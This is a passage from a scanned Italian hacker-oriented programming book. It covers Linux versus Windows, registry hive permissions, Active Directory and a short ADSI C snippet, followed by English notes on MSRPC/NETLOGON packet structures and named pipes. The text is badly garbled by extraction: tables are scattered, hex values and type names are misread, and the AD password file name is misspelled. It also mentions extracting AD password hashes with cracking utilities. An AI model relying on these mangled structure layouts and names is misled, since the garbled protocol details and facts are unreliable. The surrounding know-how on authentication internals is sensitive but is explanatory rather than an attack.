avere un periodo di maturazione in particolar modo quando questi adottano metodologie di 
base molto complesse. 

Quando si parla della stabilità di Unix ci si dimentica che questo ha avuto almeno tre volte il 
tempo di maturazione di Windows. 

Le ricerche nel campo del software costano care e quindi queste hanno portato Microsoft a 
richiedere cifre per le licenze di Windows che spesso sono sembrate spropositate. 
Un sistema operativo utilizzato sui nostri servers, Windows 2000 Advanced Server, costa 
circa 2500€ contro il costo di poche decine di dollari di una distribuzione Linux. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



L'economicità di Linux ha fatto in modo che questo fosse adottato come sistema operativo 
privilegiato in molte aziende anche molto grosse. 

Addirittura IBM ha creato una versione di Linux da installare sui propri mainframe della serie 
3090. 

Quando internet ha iniziato a diventare popolare molti provider hanno adottato questo OS per 
la gestione degli accessi in rete. 

Nel 1984 fondammo in Italia FidoNet e verso il 1987 venne creata un rete basata su Unix 
chiamata Sublink la quale utilizzava soltanto funzioni interne al sistema operativo per tutte le 
gestioni. 

Questo fa capire che già in origine la visione delle reti è stata una delle cose fondamentali di 
Unix. 

L'uso di qusto OS all'interno delle Università ha ulteriormente aumentato la sua popolarità 
facendolo diventare il sistema operativo preferito di tutti gli smanettoni. 
La cosa migliore di questo sistema operativo sta nel fatto che dispone di qualsiasi cosas già 
di default a partire dagli sniffer di rete per giungere ai linguaggi di sviluppo e a tutte le Utilities 
come ad esempio firewall ecc. 

La complessità d'uso è sicuramente maggiore di quella di Windows anche se di fatto le 
interfacce grafiche si sono propagate anche in quest'ambiente come ad esempio la Gnome e 
la KDE. 

A livello di programmazione le cose invece si invertono in quanto gli strati eccessiva, mente 
complessi di Windows costituiscono un muro per molte persone che vogliono affacciarsi a 
determinate tecnologie. 

Chiaramente non sto parlando di programmini di accesso a dei database ma airi programmi 
che intendono collegarsi agli strati OLE, ActiveX ecc. 

Tutta questa struttura immensa di Windows è nata da un ottica ambiziosa di Microsoft la 
quale in molti anni sta forse completando ora quello che Bill voleva fare. 
Nelle prime versioni del sistema operativo sono stati progettati i meccanismi di base come 
appunto OLE. 

L'iea di Bill era quella di congiungere tutte le tecnologie mediante una base di controllo 
comune. 

Su questa tecnologia OLE sono stati creati i sistemi di programmazione distribuita, i sistemi 
per la gestione deli database come ad esempio ADO, DAO, ODBC ecc. 
Semplificando possiamo dire che ancora su questi strati sono state create tecnologie ancora 
più avanzate come quella legata ad ACTIVE DIRECTORY la quale è un sistema di gestione 
unificata di un sistema di rete completo. 

Su Active Directory a sua volta sono stati creati dei servers come ad esempio MS, 
EXCHANGE, SQLERVER. 

Nell'ultima fase è stata curata la sicurezza e creata la tecnologia .NET sulla quale altri servers 
hanno offerto le basi per la creazione di servizi sempre più potenti. 

Sono di recente comparsa i servers come ad esempio ISA SERVER, SHARE PORTAL, 
BIZTALKSERVER. 

Prodotti come Visio supportandosi su questi sistemi permette la creazione di strutture di 
controllo. 

Ogni sei mesi circa Microsoft rilascia un CD con sopra i vari SDK che permettono di 

agganciarsi ai vari sistemi presenti in Windows. 

Il numero è esagerato e ci sono classi e metodi per qualsiasi scopo. 

In ogni caso come dicevamo prima Linux è sicuramente il sistema operativo più adatto ai 
nostri fini per cui un accenno a questo lo si deve per forza fare anche alla luce del fatto che 
per riuscire a gestire una sistema accedendogli dall'esterno è necessario conoscere almeno 
qualche comando utilizzato per navigare sul sistema di directory. 

Inoltre Linux dispone di un sistema particolare che gestisce la security del sistema su cui è 
installato e molte volte potrebbe anche presiedere alla sicurezza di un intera intranet. 
Abbiamo detto che la maggior parte degli strumenti è già disponibile dentro al sistema 
operativo come default. 

Tra questi esiste un sistema implementato al livello di kernel che permette di creare un 

sistema di filtraggio dei pacchetti tra due interfacce di rete dentro al sistema. 

Il altre parole Linux mediante IPCHAINS dispone di una gestione firewall molto efficiente. 



W indows 
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Windows può essere sicuramente considerato l'evoluzione a interfaccia grafica del vecchio 
DOS del quale per diverso tempo ha portato avanti moltissime caratteristiche. 
Il sistema operativo è basato sui messaggi. 

In altre parole un cuore intercetta qualsiasi evento avvenga nel nostro sistema e dopo averne 
identificata la destinazione redirige il comando verso questa. 

Il sistema di base è veramente complesso in quanto il tutto è composto da un certo numero di 
livelli destinati a gestire determinate funzionalità le quali possiedono come scopo quello di 
unificare tutte le funzionalità. 

Il progetto di Windows è sicuramente quanto di più ambizioso è stato fatto a livello di software 
e spesso proprio grazie a questa grandiosità ci si paga lo scotto. 

I vari sistemi che stanno sotto Windows hanno come scopo quello di accentrare tutte le 
informazioni del sistema e delle reti connesse all'interno di un unico database. 

Ora a noi per gli scopi di questo volume non ci interessa più di tanto discutere sulla struttra di 
Windows se non per quello che è relativo al suo registro nel quale sono memorizzate tutte le 
informazioni legate alla security. 
Che cos'è il registro di Windows ? 

II registro fornisce un database unificato in cui salvare tutte le configurazioni mediante un 
modello gerarchico. 

Fino a poco tempo fa WIN.INI è stato l'unico mezzo per configurare le applicazioni di 
Windows e le funzioni del sistema operativo. 

Al giorno d'oggi ogni voce del registro è simile ad una linea del vecchio WIN.INI. 

Uno dei principali svantaggi dei vecchi .INI è che questi erano dei normalissimi files di testo 

incapaci di memorizzare informazioni nidificate in forma di sottochiavi. 

Queste sottochiavi forniscono dei dettagli e un grosso numero di possibili informazioni di 

configurazioni per un determinato sistema operativo. 

I valori del registro possono anche essere costituite da codici eseguibili atte a fornire 
informazioni corrette per ogni singolo utente dello stesso computer. 
La capacità di salvare codice eseguibile dentro al registro estende il suo utilizzo al sistema 
operativo e agli sviluppatori di applicazioni. 

La possibilità di salvare informazioni specifiche per ogni utente permette di confezionare 
l'ambiente in modo su misura per ogni utente singolo. 

L'utility di Wndows chiamata REGEDIT o REGEDT32 permette di gestire tutte le voci del 
registro. 

Per facilitare l'uso del rgistro questo è stato suddiviso in un certo numero di gruppi di chiavi e 
precisamente quelli che seguono: 

HKEYCURRENTUSER 

Questa chiave contiene le informazioni di configurazione per gli utenti che sono loggati dentro 
al sistema. 

Queste informazioni sono la directory, i colori dello schermo e i settaggi del pannello di 
controllo. 

Questa chiave è conosciuta come User Profile. 
HKEYUSERS 

In windowsNT 3.5x, I profili utente sono salvati localmente nella directory 

system root\system32\config directory. 

In NT4.0, questa sono salvate dentro a systemroofAprofiles. 

Le informazioni specifiche di un utente sono tenute qui. 

HKEYLOCALM ACHINE 

Questa chiave contiene le infrmazioni legate alla configurazione del computer. 
Queste informazioni sono salvate nella directory systemroot\system32\config come files 
persistenti del sistema operativo. 

Le informazioni contenute in questa chiave sono utilizzate dalle applicazioni, dai device 
drivers e daòl sistema operativo. 



HKEY_CLASSES_ROOT 

Le informazioni contenute qui sono usate per aprire le applicazioni corrette 
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The information stored here is used to open the correct application when a file is opened by 
using Explorer and for Object Linking and Embedding. It is actually a window that reflects 
information from the HKEY_LOCAL_MACHINE\Software subkey. 

HKEYCURRENTCONFIG 

Le informazioni di questa chiave sono relative ai settaggi delle configurazioni come ad 
esempio dei software e dei device drivers da leggere per visualizzare la risoluzione da usare. 
La seguente tabella mostra la lista delle principali voci, alcune sottochiavi e il valore di default 
relative ai permessi d'accesso: 

The Following table lists the major Registry hives and some subkeys and the DEFAULT 
access permissions assigned: 



\ \HKEY_LOCAL_MACHINE 




Admin-Full Control 




Everyone-Read Access 




System-Full Control 


\ HARDWARE 






Admin-Full Control 




Everyone-Read Access 




System-Full Control 


\SAM 






Admin-Full Control 




Everyone-Read Access 




System-Full Control 


\SECURITY 






Admin-Special (Write DAC, Read Control) 




System-Full Control 


\ SOFTWARE 






Admin-Full Control 




Creator Owner-Full Control 




Everyone-Special (Query, Set, Create, Enumerate, Notify, 


Delete, Read) 




System-Full Control 


\ SYSTEM 






Admin-Special (Query, Set, Create, Enumerate, Notify, 


Delete, Read) 




Everyone-Read Access 




System-Full Control 


\ \ HKEY_ CURRENT_ USER 




Admin-Full Control 




Current User-Full Control 




System-Full Control 


\ \ HKEY_ USERS 




Admin-Full Control 




Current User-Full Control 




System-Full Control 


\ \HKET_CLASSES_ROOT 




Admin-Full Control 




Creator Owner-Full Control 




Everyone-Special (Query, Set, Create, Enumerate, Notify, 


Delete, Read) 




System-Full Control 


\\HKEY_CURRENT CONFIG 




Admin-Full Control 




Creator Owner-Full Control 




Everyone-Read Access 



Molti sistemi basati su Windows 2000, in particolar modo I servers di rete, utilizzano Active 
Directory per mantenere unificate tutte le informazioni relative alla struttura. 
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Grazie ad Active Directory è possibile gestire una struttura relativa ad un dominio. 

La gestione fatta da Active directory è molto complessa ed estesa in quanto potrebbe coprire 

reti anche molto grandi come ad esempio quella di Microsoft e altre delle stesse dimensioni. 

Active Directory, come abbiamo già detto, è un database accentrato che mentiene 

memorizzate tutte le informazioni relative alla strutturazione delle reti aziendali. 

Il sistema di AD è in grado di acquisire tutte le modifiche strutturali apportate alle reti gestite 

mediante sistemi Windows. 

Molti meccanismi vengono automatizzati come ad esempio le gestioni DNS. 

Generalmente quando si gestivano sistemi orientati all'hosting di domini di clienti che tengono 

i loro siti sui servers gestiti in questo modo, ci si trovava nella necessità di mantenere due tipi 

di nameservers definiti con i termini di NAMESERVER PRIMARIO e SECONDARIO. 

Active Directory automatizzando questa gestione riesce ad eguagliare le due tipologie 

facendo si che un certo server quando interrogato possa essere sempre visto come 

nameserver primario. 

Lo stesso dicasi per quanto riguarda l'aggiunta di host ad un certo dominio. 

Questi vengono sentiti automaticamente da AD e quindi la struttura rappresentativa di un 

dominio è in grado di variare dinamicamente seguendo le variazioni fisiche che la rete 

esegue. 

Anche il meccanismo della sicurezza in molte parti è in parte automatizzato da AD. 

Active Directory è basato sul protocollo LDAP e esplica la maggiora parte dei suoi vantaggi in 

quella che è la gestione di reti anche di grosse dimensioni basate su domini. 

AD potrebbe essere considerato un database accentrato di tutte le caratteristiche di una rete 

in grado di sentire e aggiornare automaticamente le proprie informazioni in base ai 

cambiamenti fisici della struttura di questa. 

Parlare solo di struttura fisica è sbagliato in quanto lo scopo fondamentale di AD è quello di 

gestire la struttura logica delle reti medio-grandi. 

In altre parole potrebbe essere visto come un servizio tutti-in-uno. 

Utilizzando il Domain Names Service, AD dissemina le informazioni appropriate a tutti gli host 
interessati. 

Il DDNS (Dynamic DNS) riesce ad eseguire della update automatiche quando un nuovo "sito" 
viene connesso alla rete. 

Tutto è memorizzato in AD a partire dagli accounts, le unità organizzative, le stampanti i 
domini e cosi via. 

AD salva le password all'interno di un file chiamato "ntdis.nit" dal quale gli hackers potrebbero 
estrarle utilizzando le classiche Utilities indirizzate all'individuazione della passwords. 
Il settaggio di AD potrebbe essere un attività critica in particolar modo per quello che riguarda 
il settaggio della permissions appropriate. 

Generalmente dovrebbe essere buona regola dell'amministratore installare AD in una 
partizione separata da quelle dove è installato Windows. 

La maggiora parte della informazioni legate alla sicurezza di un sistema sono gestite tramite 
l'utility chiamata LOCAL SECURITY SETTINGS. 
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Microsoft ha fornito alcuni modelli comparativi i quali possono essere caricati nell'utility 
mostrata prima per vedere se i settaggi del proprio sistema sono corretti rispetto al grado di 
sucurezza e allo scopo della macchina. 



Import Polìcy Fronti 



Look in: 





:Jp compatì 
_Jfhisecdc 

j^notssid 
'jprootsec 
j^securedc 
(^securews 
(j^setup security 



Modelli come hisecws, che sta per Workstation ad alta sicurezza, o securedc, che sta per 
domain controller sicuro, possono essere letti e usati in modo comparativo. 
Le eventuali discordanze sono visualizzate e possono essere modificate per mettere il 
sistema ad un ceryo livello di sicurezza. 

AD per eseguire la gestione gerarchica utilizza un concetto ovvero quello delle Organizational 
Units (Ous) le quali sono estremamente flessibili e possono essere utilizzate per controllare 
un determinato numero di proprietà legate alla sicurezza come ad esempio i privilegi. 
Le Ous costituiscono un grosso vantaggio di WINDOWS 2000 dato che supportano la 
delegazione dei privilegi. 

Ciascuna Ous può essere assegnata ad un particolare livello di privilegio. 

Le Ous children sotto ad un parent non possono mai essere settate con diritti magiori di 

quelle che lo stesso parente possiede. 

Questo metodo fornisce un eccellente schema per la gestione dei diritti, aiutando ad essere 
certi che quelli definiti con il termine di "runaway privileges" non costituiscano un problema 
all'interno di un qualche dominio. 

Ogni Ous non viene risconosciuta all'esterno del particolare dominio dentro al quale è stata 
definita. 

Esiste un SDK particolare che fornisce la possibilità di interegire da parte di un 
programmatore con il sistema di AD. 
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Tutti i var parametri di AD sono gestiti tramite un SCHEMA al quale si può accedere tramite 
l'apposito SNAPIM di MMC. 

Come abbiamo detto prima il corretto settaggio di un dominio con AD è una cosa delicata 

anche se di fatto per l'amministratore di grosse reti AD è una manna dal cielo. 

Esistono ancora alcuni problemi di compatibilità con il mondo esterno come ad esempio 

relativamente alla gestione dei DNS da parte di alcuni sistemi come quelli del NIC. 

Questo fatto che AD gestisce indipendentemente come primario sia il primario stesso che il 

secondario, crea scompensi appunto con certi gestori. 

Senza contare che l'uso di AD è orientato ai sistemi operativi Windows 2000 per cui il fato di 
usarlo diventa ideale quando ci si ha a che fare con reti costituite da sistemi gestiti da questi 
OS. 

AD è uno degli strati fondamentali in quella che è ormai la filosofia globale di Microsoft. 

Al giorno d'oggi spesso si sente ancora la gente che considera Windows come se questo di 

fatto fosse una cosa a se stante sulla quale poi viaggiano determinati software. 

AD, come abbiamo detto, dispone di un SDK che permette di interagire con questo. 

Il seguente spezzone di sorgente mostra come è possibile richiedere le caratteristiche di un 

oggetto AD. 

Colnitialize (NULL) ; 
HRESULT hr = S_OK; 

//Get rootDSE and the domain container 's DN. 
IADs *pObject = NULL; 

LPOLESTR szPath = new OLECHAR [MAX_PATH ] ; 
VARIANT var; 
BOOL blsMixed; 

hr = ADsOpenObject (L "LDAP : //rootDSE " , 

NULL, 
NULL, 

ADS_SECURE_AUTHENTICATION, //Use Secure 

Authentication 

IID_IADs, 

(void**) SpObject) ; 

if (FAILED (hr) ) 
{ 

wprintf (L"Not Found. Could not bind to the domain. \n") ; 
if (pObject) 

pObject->Release () ; 
return TRUE; 

} 

Windows è sicuramente uno degli insiemi software più complessi esistenti progettato 
mediante diverse stratificazioni di meccanismi ciascuno dei quali server a fornire determinate 
funzionalità usate dagli strati superiori. 

Alla base troviamo Windows con i vari meccanismi come ad esempio OLE. 

Su questo si basano moltissimi altri sistemi come DCOM, ActiveX, OLEDB e cosi via. 

Una serie di altri software permettono al gestione dei servers che svolgono un numero 

enorme di funzioni sui sistemi Windows tra i quali : 

MS - Internet Information Server che gestisce http e FTP 
Exchange - Gestione mail servers e canali IRCX 
SQLServer - Gestione servers SQL 
SharePortal - Gestione condivisa documenti 




Alcuni software si agganciano a tutti i pacchetti e forniscono un metodo per intergire con 
questi come ad esempio VISIO il quale non possiede un semplice scopo di eseguire 
rappresentazioni grafiche ma di fatto riesce ad intergire con gli oggetti rappresentati in 
modalità grafica. 
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W indows 2 000 Security Subsystem 

Il seguente grafico visualizza il sistema che gestisce la sicurezza sotto Windows 2000. 
L'immagine l'ho riprodotta partendo da quella raffigurata dentro al libro della Microsoft 
intitolato INSIDE MICROSOFT WINDOWS. 

Molti dei programmi che abbiamo visto nei capitoli di questo libro analizzano i vari blocchi 
schematizzati in quest'immagine come ad esempio il database delle password, il sistema LSA 
e cosi via. 

Ricordiamoci sempre che spesso le configurazioni che troviamo in ambiente Windows, dei 
sistemi client, differiscono da quelle che possiamo trovare sui servers in quanto sotto questi 
ultimi la gestione è spesso fatta da ACTIVE DIRECTORY. 
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Hardware abstraction layer 



1. File system cache 

2. Object manager 

3. PnP manager 

4. Power manager 

5. Security reference monitor 

6. Virtual monitor 

7. Process and threads 

8. Configuration manager 

9. Locai procedure cali 
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Strutture di dialogo nei processi di autenticazione di W indows. 

Il seguente documento mostra le botte e risposta eseguite nelle varie attività di Windows 
legate all'autenticazione. 

Utilizzando NETMON.EXE relativo al vostro sistema potrebbe essere più semplice 
comprendere il meccanismo. 
Il documento è stato creato da 



- Luke 


Kenneth Casson Leighton 


( lkcl@switchboard . net ) 


- Paul 


Ashton 


(paulQargo . demon . co . uk) 



Enumeratìons 



— MSRPC Header type. command number in the msrpc packet header 



MSRPC__Request : 


0x00 


MSRPC_Response : 


0x02 


MSRPC_Bind: 


OxOB 


- MSRPC Packet info. the meaning of these flags is undocumented 


FirstFrag : 


0x01 


LastFrag : 


0x02 


NotaFrag : 


0x04 


RecRespond: 


0x08 


NoMultiplex : 


0x10 


NotForldemp : 


0x20 


NotforBcast : 


0x40 


NoUuid: 





Structures 



- sizeof VOID* is 32 bits. 

- sizeof char is 8 bits. 

- UTIME is 32 bits, indicating time in seconds since 01janl970. documented 
in cifs6.txt (section 3.5 page, page 30). 

- NTTIME is 64 bits. documented in cifs6.txt (section 3.5 page, page 30). 

- DOM_SID (domain SID structure) : 



UINT32 num of sub-authorities in domain SID 

UINT8 SID revision number 

UINT8 num of sub-authorities in domain SID 




Note: the domain SID is documented elsewhere. 
- STR (string) : 



— UNIHDR (unicode string header) : 



UINT16 length of unicode string 




— UNIHDR2 (unicode string header plus buffer pointer) : 
UNIHDR unicode string header 



- UNISTR (unicode string) : 



— NAME (length— indicated unicode string) : 
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- UNISTR2 (aligned unicode string) : 



UINT8 [ ] 

UINT32 
UINT32 


padding to get unicode string 4-byte aligned 
with the start of the SMB header . 
max length of unicode string 
0 - undocumented 


- OBJ^ATTR (object 


attributes) : 


UINT32 

VOID* 

VOID* 

UINT32 

VOID* 


0x18 - length (in bytes) including the length field. 

0 - root directory (pointer) 

0 - object name (pointer) 

0 - attributes (undocumented) 

0 - security descriptior (pointer) 


- POLHND (LSA policy handle) : 


- DOM_SID2 (domain 


SID structure, SIDS stored in unicode) : 


UINT32 
UINT32 
UNIHDR2 
UNISTR 


5 - SID type 

0 - undocumented 

domain SID unicode string header 
domain SID unicode string 



Note: there is a conflict between the unicode string header and the 
unicode string itself as to which to use to indicate string 
length. this will need to be resolved. 



Note: the SID type indicates, for example, an alias; a well-known group etc. 
this is documented somewhere. 



- DOM_RID (domain RID structure) : 



UINT32 


5 — well-known SID. 1 — user 


SID (see ShowACLs) 


VINT32 


5 - undocumented 




UINT32 


domain RID 




UINT32 


0 - domain index out of above 


reference domains 



- LOG_INFO (server, account, client structure) : 

Note: logon server name starts with two '\ ' characters and is upper case. 



Note: account name is the logon client name from the LSA Request Challenge, 
with a $ on the end of it, in upper case. 





VOID* 


undocumented buffer pointer 




UNISTR2 


logon server unicode string 




UNISTR2 


account name unicode string 




VINTI 6 


sec_chan - security channel type 




UNISTR2 


logon client machine unicode string 



— CLNT_SRV (server, client names structure) : 



Note: logon server name starts with two '\ ' characters and is upper case. 

VOID* undocumented buffer pointer 

UNISTR2 logon server unicode string 

VOID* undocumented buffer pointer 

- CREDS (credentials + time stamp) 

char[8] credentials 
UT IME time stamp 

— CLNT_INF02 (server, client structure, client credentials) : 

Note: whenever this structure appears in a request, you must take a copy 
of the client-calculated credentials received, because they will be 
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used in subsequent credential checks. the presunteci intention is to 
maintain an authentlcated request/response trail . 

CLNT_SRV client and server names 

UINT8[] ???? padding, for 4-byte alignment with SMB header. 

VOID* pointer to client credentials. 



- CLNT_INFO (server, account, client structure, client credentials) : 

Note: whenever this structure appears in a request, you must take a copy 
of the client-calculated credentials received, because they will be 
used in subsequent credential checks. the presumed intention is to 
maintain an authentlcated request/response trail . 

LOG_INFO logon account info 



- ID_INF0_1 (id info structure, auth level 1) : 



VOID* 


ptr__id_info_l 


UNIHDR 


domain name unicode header 


UINT32 


param control 


UINT64 


logon ID 


UNIHDR 


user name unicode header 


UNIHDR 


workgroup name unicode header 


char[16] 


rei LM OWF Password 


char[16] 


rei NT OWF Password 


UNISTR2 


domain name unicode string 


UNISTR2 


user name unicode string 



SAM_INFO (sam logon/logoff id info structure) : 

Note: presumably, the return credentials is supposedly for the server to 
verify that the credential chain hasn't been compromised. 

CLNT_INF02 client identification/authentication info 

VOID* pointer to return credentials . 

CREO return credentials — ignored. 

UINT16 logon level 

UINT16 switch value 

switch (switch value) 
case 1 : 



ID_INF0_1 



} 



idinfo_l; 



GID (group id info) : 

UINT32 group id 



DOM REF (domain reference info) 



VOID* 

UINT32 

VOID* 

UINT32 

UINT32 



undocumented buffer pointer . 
num referenced domains? 

undocumented domain name buffer pointer . 
32 — max number of entries 
4 — num referenced domains? 



UNIHDR2 domain name unicode string header 

UNIHDR2 [num refdoms-1] referenced domain unicode string headers 



UNISTR 



domain name unicode string 



DOM INFO (domain info, levels 3 and 5 are the same) ) 



UINT8[] ??? padding to get 4-byte alignment with start of SMB header 

UINT16 domain name string length * 2 

UINT16 domain name string length * 2 

VOID* undocumented domain name string buffer pointer 

VOID* undocumented domain SID string buffer pointer 
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- USER_INFO (user logon info) : 



Note: it would be nice to know what the 16 byte user session key is for. 



NTTIME 


logon time 


NTTIME 


logoff time 


NTTIME 


kickoff time 


NTTIME 


password last set time 


NTTIME 


password can change time 


NTTIME 


password must change time 


UNIHDR 


username unicode string header 


UNIHDR 


user ' s full name unicode string header 


UNIHDR 


logon script unicode string header 


UNIHDR 


profile path unicode string header 


UNIHDR 


home directory unicode string header 


UNIHDR 


home directory drive unicode string header 


UINT16 


logon count 


UINT16 


bad password count 


UINT32 


User ID 


UINT32 


Group ID 


UINT32 


num groups 


VOID* 


undocumented buffer pointer to groups. 


UINT32 


user flags 


char[16] 


user session key 


UNIHDR 


logon server unicode string header 


UNIHDR 


logon domain unicode string header 


VOID* 


undocumented logon domain id pointer 


char[40] 


40 undocumented padding bytes. future expansion? 


UINT32 


0 - num other sids? 


VOID* 


NULL — undocumented pointer to other domain SIDs. 


UNISTR2 


username unicode string 


UNISTR2 


user ' s full name unicode string 


UNISTR2 


logon script unicode string 


UNISTR2 


profile path unicode string 


UNISTR2 


home directory unicode string 


UNISTR2 


home directory drive unicode string 


UINT32 


num groups 


GID [num_groups ] 


group info 


UNISTR2 


logon server unicode string 


UNISTR2 


logon domain unicode string 


DOM SID 


domain SID 



- SH_INF0_1_PTR (pointers to level 1 share info strings) : 



Note: see cifsrap2.txt section5, page 10. 

0 for shil^type indicates a Disk. 

1 for shil_type indicates a Print Queue. 

2 for shil_type indicates a Device. 

3 for shil_type indicates an IPC pipe. 

0x8000 0000 (top bit set in shil_type) indicates a hidden share. 



VOID* 
UINT32 


shil_netname — 
shil tw>e - 


pointer to net name 

twe of share. 0 - undocumented. 




- SH_INF0_1_STR 


(level 1 share info 


strings) : 


UNISTR2 
UNISTR2 


shil_netname — 
shil_remark — 


unicode string of net name 
unicode string of comment . 



- SHARE_INFO_l_CTR : 



share container with 0 entries: 
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share container with > 0 entries: 



UINT32 




EntriesRead 


UINT32 




non-zero — Buffer 


UINT32 




EntriesRead 


SH_INFO_l_ 


_PTR [EntriesRead] 


share entry pointers 


SH_INFO_l_ 


_STR [EntriesRead] 


share entry strings 


UINT8 [ ] 




padding to get unicode string i-byte 






aligned with start of the SMB header. 


UINT32 




EntriesRead 


UINT32 




0 - padding 



- SERVER_INFO_101 : 



Note: see cifs6.txt section 6.4 — the fields described therein will be 
of assistance here. for example, the type listed below is the 
same as fServerType, which is described in 6.4.1. 



SV_TYPE__ 


WORKSTATION 


0x00000001 


Ali workstations 


SV_TYPE__ 


SERVER 


0x00000002 


Ali server s 


SV_TYPE__ 


SQLSERVER 


0x00000004 


Any server running with SQL 








server 


SV_TYPE_ 


DOMAIN^ CTRL 


0x00000008 


Primary domain controller 


SV_TYPE_ 


DOMAIN BAKCTRL 


0x00000010 


Backup domain controller 


SV_TYPE_ 


_TIME_SOURCE 


0x00000020 


Server running the timesource 






service 


SV_TYPE__ 


AFP 


0x00000040 


Apple File Protocol servers 


SV_TYPE_ 


NOVELL 


0x00000080 


Novell servers 


SV_TYPE_ 


POMAIN_MEMBER 


0x00000100 


Domain Member 


SV_TYPE__ 


PRINTQ_SERVER 


0x00000200 


Server sharing print queue 


SV_TYPE_ 


DIALIN_SERVER 


0x00000400 


Server running dialin service. 


SV_TYPE_ 


_XENIX_SERVER 


0x00000800 


Xenix server 


SV_TYPE_ 


NT 


0x00001000 


NT server 


SV_TYPE_ 


WFW 


0x00002000 


Server running Windows for 


SV_TYPE_ 


SERVER_NT 


0x00008000 


Windows NT non DC server 


SV_TYPE_ 


POTENTIAL_BROWSER 


0x00010000 


Server that can run the browser 








service 


SV_TYPE_ 


BACKUP^BROWSER 


0x00020000 


Backup browser server 


SV_TYPE__ 


MASTER_BROWSER 


0x00040000 


Master browser server 


SV_TYPE_ 


DOMAIN_MASTER 


0x00080000 


Domain Master Browser server 


SV_TYPE_ 


,LOCAL_LIST_ONLY 


0x40000000 


Enumerate only entries marked 








"locai " 


SV_TYPE_ 


DOMAIN_ENUM 


0x80000000 


Enumerate Domains. The pszServer 








and pszDomain parameters must be 








NULL. 


UINT32 


500 - platform_id 




VOID* 


pointer to 


name 




UINT32 


5 — major version 




UINT32 


4 — minor version 




UINT32 


type (SV_TYPE_... bit field) 


VOID* 


pointer to 


comment 




UNISTR2 


svi Olname 


— unicode string of server name 


0NISTR2 


sv_101 comment — unicode string of server comment . 


UINT8 [ ] 


padding to 


get unicode 


string 4— byte 




aligned with start of the SMB header. 



MSRPC over Transact Named Pipe 



For details on the SMB Transact Named Pipe, see cifs6.txt 
MSRPC Pipes 



The MSRPC is conducted over an SMB Transact Pipe with a name of "\PIPE\" . 
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You must first obtain a 16 bit file handle, by sending a SMBopenX with the 
pipe name "\PIPE\srvsvc" for example. You can then perforiti an SMB Trans, 
and must carry out an SMBclose on the file handle once you are finished. 

Trans Requests must be sent with two setup UINT16s, no UINT16 params (none 
known about) , and UINT8 data parameters sufficient to contain the MSRPC 
header, and MSRPC data. The first UINT16 setup parameter must be either 
0x0026 to indicate an RPC, or 0x0001 to indicate Set Named Pipe Handle 
state. The second UINT16 parameter must be the file handle for the pipe, 
obtained above. 



The Data section for an API Command of 0x0026 (RPC pipe) in the Trans 
Request is the RPC Header, followed by the RPC Data. The Data section for 
an API Command of 0x0001 (Set Named Pipe Handle state) is two bytes . The 
only value seen for these two bytes is 0x00 0x43. 



MSRPC Responses are sent as response data inside standard SMB Trans 
responses, with the MSRPC Header, MSRPC Data and MSRPC tail. 



It is suspected that the Trans Requests will need to be at least 2-byte 
aligned (probably 4-byte) . This is standard practice for SMBs. It is also 
independent of the observed 4-byte alignments with the start of the MSRPC 
header, including the 4-byte alignment between the MSRPC header and the 
MSRPC data. 



First, an SMBtconX connection is made to the IPC$ share. The connection 
must be made using encrypted passwords, not clear-text . Then, an SMBopenX 
is made on the pipe. Then, a Set Named Pipe Handle State must be sent, 
after which the pipe is ready to accept API commands. Lastly, and SMBclose 
is sent. 



To be resolved: 



lkcl/01nov97 there appear to be two additional bytes after the null- 
terminated \PIPE\ name for the RPC pipe. Values seen so far are 
listed below: 



initial SMBopenX request: RPC API command 0x26 params: 

"\\PIPE\\lsarpc" 0x65 0x63; 0x72 0x70; 0x44 0x65; 



Header 



[section to be rewritten, following receipt of work by Duncan Stansfield] 



Interesting note: if you set packed data representation to 0x0100 0000 
then ali 4-byte and 2-byte word ordering is turned around! 

The start of each of the NTLSA and NETLOGON named pipes begins with: 



00 
01 
02 
03 
04 
08 
OA 
OC 
10 
14 
16 
17 



UINT8 

UINT8 

UINT8 

UINT8 

UINT32 

UINT1 6 

UINT1 6 

UINT32 

UINT32 

UINT1 6 

UINT8 

UINT8 



5 — RPC major version 
0 — RPC minor version 

2 - RPC response packet 

3 — (FirstFrag bit—wise or with LastFrag) 
0x1000 0000 - packed data representation 

fragment length - data size (bytes) ine header and tail. 
0 - authentication length 

cali identifier . matches 12th UINT32 of incoming RPC data, 
allocation hint — data size (bytes) minus header and tail. 
0 - presentation context identifier 
0 — cancel count 

in replies : 0 - reserved; in requests: opnum - see idefines . 



RPC__Packet for request, response, bind and bind acknowledgement . 
{ 
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UINT8 versionmin 

UINT8 type 

UINT8 flags 

UINT32 representation 

UINT16 fraglength 

UINT16 authlength 

UINT32 callid 



§ reply same as request (0x00) 

# one of the MSRPC_Type enums 

# reply same as request (0x00 for Bind, 0x03 for Request) 
§ reply same as request (0x00000010) 

# the length of the data section of the SMB trans packet 
§ cali Identifier. (e.g. 0x00149594) 



# the interfaces are numbered. as yet I haven't seen more than one interface 

# used on the same pipe name 

# srvsvc 

# abstract (0x4B324FC8, 0x01D31670, 0x475A7812, 0x88E16EBF, 0x00000003) 

# transfer (0x8A885D04, 0xllC91CEB, 0x0008E89F, 0x6048102B, 0x00000002) 
RPC_Iface RW 

{ 

UINT8 byte [16] §16 bytes of number 



} 



# the remainder of the packet after the header if "type" was Bind 



# in the response header, 
RPC^ReqBind RW 



"type" should be BindAck 



UINT16 maxtsize # 

UINT16 maxrsize # 

UINT32 assocgid # 

UINT32 numelements # 

UINT16 contextid # 

UINT8 numsyntaxes # 

UINT8[] # 



maximum transmission fragment size (0x1630) 

max receive fragment size (0x1630) 

associated group id (0x0) 

the number of elements (Oxl) 

presentation context identifier (0x0) 

the number of syntaxes (has always been 1?) (Oxl) 

4-byte alignment padding, against SMB header 



abstractint 
ansferint 



USE RPC^Iface 
USE RPC^Iface 



# num and vers. 

# num and vers. 



of interface 
of interface 



client is using 
to use for replies 



splie 



RPC^Address RW 



UINT16 length 

* port USE string 



# length of the string including nuli terminator 

# the string above in single byte, nuli terminated form 



the response to place after the header in the reply packet 



RPC_ResBind RW 








{ 

UINT16 maxtsize 
UINT16 maxrsize 
UINT32 assocgid 




§ same as request 
§ same as request 
§ zero 




* secondaddr USE 


RPC_Address 


# the address string, as described earlier 


UINT8[] 




§ 4— byte alignment padding, against SMB 


header 


UINT8 numresults 




§ the number of results (0x01) 




UINT8[] 
UINT16 result 
UINT16 reason 




§ 4— byte alignment padding, against SMB 

# result (0x00 = accept) 

# reason (0x00 = no reason speci fied) 


header 


* transfersyntax 


USE RPC^Iface 


# the transfer syntax from the request 





# the remainder of the packet after the header for every other other 

